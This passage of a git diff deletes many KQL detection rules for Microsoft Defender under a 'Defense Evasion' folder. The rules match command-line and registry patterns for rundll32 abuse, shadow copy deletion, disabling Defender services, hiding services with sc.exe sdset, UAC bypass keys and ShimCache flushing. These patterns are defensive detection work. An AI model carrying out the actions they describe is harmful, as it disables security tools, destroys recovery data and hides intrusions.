-// Author: Sergey Soldatov, Kaspersky Lab, oscd.community
-// Date: 2019/10/30
-// Level: high
-// Description: Detects PowerShell script execution from Alternate Data Stream (ADS)
-// Tags: attack.defense_evasion, attack.t1564.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Get-Content" and ProcessCommandLine contains "-Stream") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Run_PowerShell_Script_from_Redirected_Input_Stream.kql b/Defense Evasion/Run_PowerShell_Script_from_Redirected_Input_Stream.kql
deleted file mode 100644
index bd9b3783..00000000
--- a/Defense Evasion/Run_PowerShell_Script_from_Redirected_Input_Stream.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Moriarty Meng (idea), Anton Kutepov (rule), oscd.community
-// Date: 2020/10/17
-// Level: high
-// Description: Detects PowerShell script execution via input stream redirect
-// Tags: attack.defense_evasion, attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine matches regex "\\s-\\s*<" and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Rundll32_Execution_With_Uncommon_DLL_Extension.kql b/Defense Evasion/Rundll32_Execution_With_Uncommon_DLL_Extension.kql
deleted file mode 100644
index 7c4422f8..00000000
--- a/Defense Evasion/Rundll32_Execution_With_Uncommon_DLL_Extension.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou
-// Date: 2022/01/13
-// Level: medium
-// Description: Detects the execution of rundll32 with a command line that doesn't contain a common extension
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceProcessEvents
-| where (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and (not((ProcessCommandLine =~ "" or ((ProcessCommandLine contains ".cpl " or ProcessCommandLine contains ".cpl," or ProcessCommandLine contains ".cpl\"" or ProcessCommandLine contains ".cpl'" or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".dll," or ProcessCommandLine contains ".dll\"" or ProcessCommandLine contains ".dll'" or ProcessCommandLine contains ".inf " or ProcessCommandLine contains ".inf," or ProcessCommandLine contains ".inf\"" or ProcessCommandLine contains ".inf'") or (ProcessCommandLine endswith ".cpl" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".inf")) or ProcessCommandLine contains " -localserver " or isnull(ProcessCommandLine) or ((ProcessCommandLine contains ":\\Windows\\Installer\\" and ProcessCommandLine contains ".tmp" and ProcessCommandLine contains "zzzzInvokeManagedCustomActionOutOfProc") and InitiatingProcessFolderPath endswith "\\msiexec.exe")))) and (not((InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\AppData\\Local\\Microsoft\\EdgeUpdate\\Install\\{" and InitiatingProcessCommandLine contains "\\EDGEMITMP_" and InitiatingProcessCommandLine contains ".tmp\\setup.exe" and InitiatingProcessCommandLine contains "--install-archive=" and InitiatingProcessCommandLine contains "--previous-version=" and InitiatingProcessCommandLine contains "--msedgewebview --verbose-logging --do-not-launch-msedge --user-level")))
\ No newline at end of file
diff --git a/Defense Evasion/Rundll32_Execution_Without_CommandLine_Parameters.kql b/Defense Evasion/Rundll32_Execution_Without_CommandLine_Parameters.kql
deleted file mode 100644
index 11cc1e9b..00000000
--- a/Defense Evasion/Rundll32_Execution_Without_CommandLine_Parameters.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/05/27
-// Level: high
-// Description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity
-// Tags: attack.defense_evasion, attack.t1202
-DeviceProcessEvents
-| where (ProcessCommandLine endswith "\\rundll32.exe" or ProcessCommandLine endswith "\\rundll32.exe\"" or ProcessCommandLine endswith "\\rundll32") and (not((InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Microsoft\\Edge\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Rundll32_InstallScreenSaver_Execution.kql b/Defense Evasion/Rundll32_InstallScreenSaver_Execution.kql
deleted file mode 100644
index 756a6a72..00000000
--- a/Defense Evasion/Rundll32_InstallScreenSaver_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec
-// Date: 2022/04/28
-// Level: medium
-// Description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver
-// Tags: attack.t1218.011, attack.defense_evasion
-DeviceProcessEvents
-| where ProcessCommandLine contains "InstallScreenSaver" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Rundll32_Internet_Connection.kql b/Defense Evasion/Rundll32_Internet_Connection.kql
deleted file mode 100644
index 2acd0757..00000000
--- a/Defense Evasion/Rundll32_Internet_Connection.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2017/11/04
-// Level: medium
-// Description: Detects a rundll32 that communicates with public IP addresses
-// Tags: attack.defense_evasion, attack.t1218.011, attack.execution
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (not((InitiatingProcessCommandLine endswith "\\system32\\PcaSvc.dll,PcaPatchSdbTask" or DeviceName endswith ".internal.cloudapp.net" or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.0.0.0/8") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/16") or ipv4_is_in_range(RemoteIP, "51.105.0.0/16")) or (RemotePort == 443 and InitiatingProcessParentFileName =~ "svchost.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Rundll32_Spawned_Via_Explorer.EXE.kql b/Defense Evasion/Rundll32_Spawned_Via_Explorer.EXE.kql
deleted file mode 100644
index 0e6f7b7c..00000000
--- a/Defense Evasion/Rundll32_Spawned_Via_Explorer.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: CD_ROM_
-// Date: 2022/05/21
-// Level: medium
-// Description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary.
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where ((FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\explorer.exe") and (not((ProcessCommandLine contains " C:\\Windows\\System32\\" or ProcessCommandLine endswith " -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617")))
\ No newline at end of file
diff --git a/Defense Evasion/Rundll32_UNC_Path_Execution.kql b/Defense Evasion/Rundll32_UNC_Path_Execution.kql
deleted file mode 100644
index 17761d13..00000000
--- a/Defense Evasion/Rundll32_UNC_Path_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/10
-// Level: high
-// Description: Detects rundll32 execution where the DLL is located on a remote location (share)
-// Tags: attack.defense_evasion, attack.execution, attack.t1021.002, attack.t1218.011
-DeviceProcessEvents
-| where ProcessCommandLine contains " \\\\" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/Defense Evasion/SCR_File_Write_Event.kql b/Defense Evasion/SCR_File_Write_Event.kql
deleted file mode 100644
index 037d4717..00000000
--- a/Defense Evasion/SCR_File_Write_Event.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
-// Date: 2022/04/27
-// Level: medium
-// Description: Detects the creation of screensaver files (.scr) outside of system folders. Attackers may execute an application as an ".SCR" file using "rundll32.exe desk.cpl,InstallScreenSaver" for example.
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceFileEvents
-| where FolderPath endswith ".scr" and (not((FolderPath contains ":\\$WINDOWS.~BT\\NewOS\\" or FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\" or FolderPath contains ":\\WUDownloadCache\\")))
\ No newline at end of file
diff --git a/Defense Evasion/SQL_Client_Tools_PowerShell_Session_Detection.kql b/Defense Evasion/SQL_Client_Tools_PowerShell_Session_Detection.kql
deleted file mode 100644
index 8cf3471a..00000000
--- a/Defense Evasion/SQL_Client_Tools_PowerShell_Session_Detection.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Agro (@agro_sev) oscd.communitly
-// Date: 2020/10/13
-// Level: medium
-// Description: This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.
-Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
-
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where (FolderPath endswith "\\sqltoolsps.exe" or InitiatingProcessFolderPath endswith "\\sqltoolsps.exe" or ProcessVersionInfoOriginalFileName =~ "\\sqltoolsps.exe") and (not(InitiatingProcessFolderPath endswith "\\smss.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/SafeBoot_Registry_Key_Deleted_Via_Reg.EXE.kql b/Defense Evasion/SafeBoot_Registry_Key_Deleted_Via_Reg.EXE.kql
deleted file mode 100644
index 94cb9201..00000000
--- a/Defense Evasion/SafeBoot_Registry_Key_Deleted_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Tim Shelton
-// Date: 2022/08/08
-// Level: high
-// Description: Detects execution of "reg.exe" commands with the "delete" flag on safe boot registry keys. Often used by attacker to prevent safeboot execution of security products
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " delete " and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot") and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/Defense Evasion/ScreenSaver_Registry_Key_Set.kql b/Defense Evasion/ScreenSaver_Registry_Key_Set.kql
deleted file mode 100644
index c98e2ab2..00000000
--- a/Defense Evasion/ScreenSaver_Registry_Key_Set.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)
-// Date: 2022/05/04
-// Level: medium
-// Description: Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl
-// Tags: attack.defense_evasion, attack.t1218.011
-DeviceRegistryEvents
-| where InitiatingProcessFolderPath endswith "\\rundll32.exe" and (RegistryValueData endswith ".scr" and RegistryKey contains "\\Control Panel\\Desktop\\SCRNSAVE.EXE") and (not((RegistryValueData contains "C:\\Windows\\System32\\" or RegistryValueData contains "C:\\Windows\\SysWOW64\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Scripted_Diagnostics_Turn_Off_Check_Enabled_-_Registry.kql b/Defense Evasion/Scripted_Diagnostics_Turn_Off_Check_Enabled_-_Registry.kql
deleted file mode 100644
index ca2477a7..00000000
--- a/Defense Evasion/Scripted_Diagnostics_Turn_Off_Check_Enabled_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io
-// Date: 2022/06/15
-// Level: medium
-// Description: Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Policies\\Microsoft\\Windows\\ScriptedDiagnostics\\TurnOffCheck"
\ No newline at end of file
diff --git a/Defense Evasion/Sdiagnhost_Calling_Suspicious_Child_Process.kql b/Defense Evasion/Sdiagnhost_Calling_Suspicious_Child_Process.kql
deleted file mode 100644
index 620fe02e..00000000
--- a/Defense Evasion/Sdiagnhost_Calling_Suspicious_Child_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nextron Systems
-// Date: 2022/06/01
-// Level: high
-// Description: Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)
-// Tags: attack.defense_evasion, attack.t1036, attack.t1218
-DeviceProcessEvents
-| where (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\taskkill.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\calc.exe") and InitiatingProcessFolderPath endswith "\\sdiagnhost.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Security_Service_Disabled_Via_Reg.EXE.kql b/Defense Evasion/Security_Service_Disabled_Via_Reg.EXE.kql
deleted file mode 100644
index 0e33ccc2..00000000
--- a/Defense Evasion/Security_Service_Disabled_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), John Lambert (idea), elhoim
-// Date: 2021/07/14
-// Level: high
-// Description: Detects execution of "reg.exe" to disable security services such as Windows Defender.
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\\AppIDSvc" or ProcessCommandLine contains "\\MsMpSvc" or ProcessCommandLine contains "\\NisSrv" or ProcessCommandLine contains "\\SecurityHealthService" or ProcessCommandLine contains "\\Sense" or ProcessCommandLine contains "\\UsoSvc" or ProcessCommandLine contains "\\WdBoot" or ProcessCommandLine contains "\\WdFilter" or ProcessCommandLine contains "\\WdNisDrv" or ProcessCommandLine contains "\\WdNisSvc" or ProcessCommandLine contains "\\WinDefend" or ProcessCommandLine contains "\\wscsvc" or ProcessCommandLine contains "\\wuauserv") and (ProcessCommandLine contains "d 4" and ProcessCommandLine contains "v Start")) and (ProcessCommandLine contains "reg" and ProcessCommandLine contains "add")
\ No newline at end of file
diff --git a/Defense Evasion/Self_Extracting_Package_Creation_Via_Iexpress.EXE_From_Potentially_Suspicious_Location.kql b/Defense Evasion/Self_Extracting_Package_Creation_Via_Iexpress.EXE_From_Potentially_Suspicious_Location.kql
deleted file mode 100644
index 6fbf2187..00000000
--- a/Defense Evasion/Self_Extracting_Package_Creation_Via_Iexpress.EXE_From_Potentially_Suspicious_Location.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/02/05
-// Level: high
-// Description: Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations.
-This behavior has been observed in-the-wild by different threat actors.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " /n " and (FolderPath endswith "\\iexpress.exe" or ProcessVersionInfoOriginalFileName =~ "IEXPRESS.exe") and (ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\")
\ No newline at end of file
diff --git a/Defense Evasion/Self_Extraction_Directive_File_Created_In_Potentially_Suspicious_Location.kql b/Defense Evasion/Self_Extraction_Directive_File_Created_In_Potentially_Suspicious_Location.kql
deleted file mode 100644
index d968330c..00000000
--- a/Defense Evasion/Self_Extraction_Directive_File_Created_In_Potentially_Suspicious_Location.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Joseliyo Sanchez, @Joseliyo_Jstnk
-// Date: 2024/02/05
-// Level: medium
-// Description: Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location.
-These files are used by the "iexpress.exe" utility in order to create self extracting packages.
-Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceFileEvents
-| where (FolderPath contains ":\\ProgramData\\" or FolderPath contains ":\\Temp\\" or FolderPath contains ":\\Windows\\System32\\Tasks\\" or FolderPath contains ":\\Windows\\Tasks\\" or FolderPath contains ":\\Windows\\Temp\\" or FolderPath contains "\\AppData\\Local\\Temp\\") and FolderPath endswith ".sed"
\ No newline at end of file
diff --git a/Defense Evasion/Service_Binary_in_Suspicious_Folder.kql b/Defense Evasion/Service_Binary_in_Suspicious_Folder.kql
deleted file mode 100644
index 2b8c5e74..00000000
--- a/Defense Evasion/Service_Binary_in_Suspicious_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), frack113
-// Date: 2022/05/02
-// Level: high
-// Description: Detect the creation of a service with a service binary located in a suspicious directory
-// Tags: attack.defense_evasion, attack.t1112
-DeviceRegistryEvents
-| where (((RegistryValueData in~ ("DWORD (0x00000000)", "DWORD (0x00000001)", "DWORD (0x00000002)")) and (InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Perflogs\\" or InitiatingProcessFolderPath contains "\\ADMIN$\\" or InitiatingProcessFolderPath contains "\\Temp\\") and RegistryKey endswith "\\Start" and RegistryKey startswith "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services") or ((RegistryValueData contains "\\Users\\Public\\" or RegistryValueData contains "\\Perflogs\\" or RegistryValueData contains "\\ADMIN$\\" or RegistryValueData contains "\\Temp\\") and RegistryKey endswith "\\ImagePath" and RegistryKey startswith "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet001\\Services")) and (not((InitiatingProcessFolderPath contains "\\Common Files\\" and InitiatingProcessFolderPath contains "\\Temp\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql b/Defense Evasion/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql
deleted file mode 100644
index 04c45340..00000000
--- a/Defense Evasion/Service_DACL_Abuse_To_Hide_Services_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021/12/20
-// Level: high
-// Description: Detects usage of the "sc.exe" utility adding a new service with special permission seen used by threat actors which makes the service hidden and unremovable.
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where (ProcessCommandLine contains "sdset" and ProcessCommandLine contains "DCLCWPDTSD") and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Service_Registry_Key_Deleted_Via_Reg.EXE.kql b/Defense Evasion/Service_Registry_Key_Deleted_Via_Reg.EXE.kql
deleted file mode 100644
index b4ed8585..00000000
--- a/Defense Evasion/Service_Registry_Key_Deleted_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/01
-// Level: high
-// Description: Detects execution of "reg.exe" commands with the "delete" flag on services registry key. Often used by attacker to remove AV software services
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " delete " and (FolderPath endswith "reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\services\\"
\ No newline at end of file
diff --git a/Defense Evasion/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql b/Defense Evasion/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql
deleted file mode 100644
index a2adcfc1..00000000
--- a/Defense Evasion/Service_Security_Descriptor_Tampering_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/28
-// Level: medium
-// Description: Detection of sc.exe utility adding a new service with special permission which hides that service.
-// Tags: attack.persistence, attack.defense_evasion, attack.privilege_escalation, attack.t1574.011
-DeviceProcessEvents
-| where ProcessCommandLine contains "sdset" and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Service_StartupType_Change_Via_PowerShell_Set-Service.kql b/Defense Evasion/Service_StartupType_Change_Via_PowerShell_Set-Service.kql
deleted file mode 100644
index c22f6141..00000000
--- a/Defense Evasion/Service_StartupType_Change_Via_PowerShell_Set-Service.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/04
-// Level: medium
-// Description: Detects the use of the PowerShell "Set-Service" cmdlet to change the startup type of a service to "disabled" or "manual"
-// Tags: attack.execution, attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "Disabled" or ProcessCommandLine contains "Manual") and (ProcessCommandLine contains "Set-Service" and ProcessCommandLine contains "-StartupType")) and (FolderPath endswith "\\powershell.exe" or ProcessVersionInfoOriginalFileName =~ "PowerShell.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Service_StartupType_Change_Via_Sc.EXE.kql b/Defense Evasion/Service_StartupType_Change_Via_Sc.EXE.kql
deleted file mode 100644
index dc89c692..00000000
--- a/Defense Evasion/Service_StartupType_Change_Via_Sc.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/01
-// Level: medium
-// Description: Detect the use of "sc.exe" to change the startup type of a service to "disabled" or "demand"
-// Tags: attack.execution, attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "disabled" or ProcessCommandLine contains "demand") and (ProcessCommandLine contains " config " and ProcessCommandLine contains "start")) and (FolderPath endswith "\\sc.exe" or ProcessVersionInfoOriginalFileName =~ "sc.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Set_Suspicious_Files_as_System_Files_Using_Attrib.EXE.kql b/Defense Evasion/Set_Suspicious_Files_as_System_Files_Using_Attrib.EXE.kql
deleted file mode 100644
index fd22f26f..00000000
--- a/Defense Evasion/Set_Suspicious_Files_as_System_Files_Using_Attrib.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs
-
-// Tags: attack.defense_evasion, attack.t1564.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " +s" and (ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs") and (FolderPath endswith "\\attrib.exe" or ProcessVersionInfoOriginalFileName =~ "ATTRIB.EXE") and (ProcessCommandLine contains " %" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "\\ProgramData\\" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Windows\\Temp\\")) and (not((ProcessCommandLine contains "\\Windows\\TEMP\\" and ProcessCommandLine contains ".exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql b/Defense Evasion/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql
deleted file mode 100644
index ef8ae60e..00000000
--- a/Defense Evasion/Shadow_Copies_Deletion_Using_Operating_Systems_Utilities.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)
-// Date: 2019/10/22
-// Level: high
-// Description: Shadow Copies deletion using operating systems utilities
-// Tags: attack.defense_evasion, attack.impact, attack.t1070, attack.t1490
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "shadow" and ProcessCommandLine contains "delete") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\diskshadow.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll", "wmic.exe", "VSSADMIN.EXE", "diskshadow.exe")))) or ((ProcessCommandLine contains "delete" and ProcessCommandLine contains "catalog" and ProcessCommandLine contains "quiet") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")) or (((ProcessCommandLine contains "unbounded" or ProcessCommandLine contains "/MaxSize=") and (ProcessCommandLine contains "resize" and ProcessCommandLine contains "shadowstorage")) and (FolderPath endswith "\\vssadmin.exe" or ProcessVersionInfoOriginalFileName =~ "VSSADMIN.EXE"))
\ No newline at end of file
diff --git a/Defense Evasion/Shell32_DLL_Execution_in_Suspicious_Directory.kql b/Defense Evasion/Shell32_DLL_Execution_in_Suspicious_Directory.kql
deleted file mode 100644
index 572e8c51..00000000
--- a/Defense Evasion/Shell32_DLL_Execution_in_Suspicious_Directory.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/11/24
-// Level: high
-// Description: Detects shell32.dll executing a DLL in a suspicious directory
-// Tags: attack.defense_evasion, attack.execution, attack.t1218.011
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%LocalAppData%" or ProcessCommandLine contains "%Temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\" or ProcessCommandLine contains "\\Temp\\" or ProcessCommandLine contains "\\Users\\Public\\") and (ProcessCommandLine contains "shell32.dll" and ProcessCommandLine contains "Control_RunDLL")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Defense Evasion/Shell_Open_Registry_Keys_Manipulation.kql b/Defense Evasion/Shell_Open_Registry_Keys_Manipulation.kql
deleted file mode 100644
index 3d4deb59..00000000
--- a/Defense Evasion/Shell_Open_Registry_Keys_Manipulation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christian Burkard (Nextron Systems)
-// Date: 2021/08/30
-// Level: high
-// Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1548.002, attack.t1546.001
-DeviceRegistryEvents
-| where (RegistryValueData contains "\\Software\\Classes\\{" and ActionType =~ "RegistryValueSet" and RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\SymbolicLinkValue") or RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\DelegateExecute" or ((ActionType =~ "RegistryValueSet" and (RegistryKey endswith "Classes\\ms-settings\\shell\\open\\command\\(Default)" or RegistryKey endswith "Classes\\exefile\\shell\\open\\command\\(Default)")) and (not(RegistryValueData =~ "(Empty)")))
\ No newline at end of file
diff --git a/Defense Evasion/ShimCache_Flush.kql b/Defense Evasion/ShimCache_Flush.kql
deleted file mode 100644
index f8a6db43..00000000
--- a/Defense Evasion/ShimCache_Flush.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021/02/01
-// Level: high
-// Description: Detects actions that clear the local ShimCache and remove forensic evidence
-// Tags: attack.defense_evasion, attack.t1112
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "apphelp.dll") and (ProcessCommandLine contains "ShimFlushCache" or ProcessCommandLine contains "#250")) or ((ProcessCommandLine contains "rundll32" and ProcessCommandLine contains "kernel32.dll") and (ProcessCommandLine contains "BaseFlushAppcompatCache" or ProcessCommandLine contains "#46"))
\ No newline at end of file
diff --git a/Defense Evasion/Sideloading_Link.EXE.kql b/Defense Evasion/Sideloading_Link.EXE.kql
deleted file mode 100644
index 86e7b9e1..00000000
--- a/Defense Evasion/Sideloading_Link.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/22
-// Level: medium
-// Description: Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary "link.exe". They can be abused to sideload any binary with the same name
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
